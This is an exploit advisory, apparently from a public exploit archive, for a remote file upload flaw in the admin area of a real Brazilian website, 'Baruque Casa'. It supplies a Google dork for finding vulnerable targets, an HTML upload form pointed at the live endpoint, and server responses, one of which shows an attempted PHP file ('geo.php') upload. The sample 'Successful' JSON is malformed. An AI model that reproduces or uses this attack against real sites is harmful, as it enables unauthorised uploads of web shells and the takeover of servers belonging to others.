# Exploit Title: Baruque Casa Remote File Upload Vulnerability
# Google Dork: intext:Copyright Baruque Casa.
# Exploit Author: Mr.T959
# Author Website : http://mr-t959.xyz
# Tested on: Windows 7
--------------------------------------
# Exploit HTML Code :
<form method='post' target='_blank' action='http://www.baruquecasa.com.br/admin/server/php/' enctype='multipart/form-data'>
<input type='file' name='files[]'><input type='submit' name='g' value='Upload Cok!'></form>
# Exploit
admin/server/php/
# Successful
{"files[{"name":"b6fa0f07f57514815d1b310a6b97d70e.jpeg","size":5362,"type":"image\/jpeg","url":"http:\/\/www.baruquecasa.com.br\/admin\/server\/php\/fotos\/b6fa0f07f57514815d1b310a6b97d70e.jpeg"
# Error
{"files":[{"name":"geo.php","size":3468,"type":"application\/octet-stream","error":"Filetype not allowed"}]}
# Demo
http://www.baruquecasa.com.br/admin/server/php/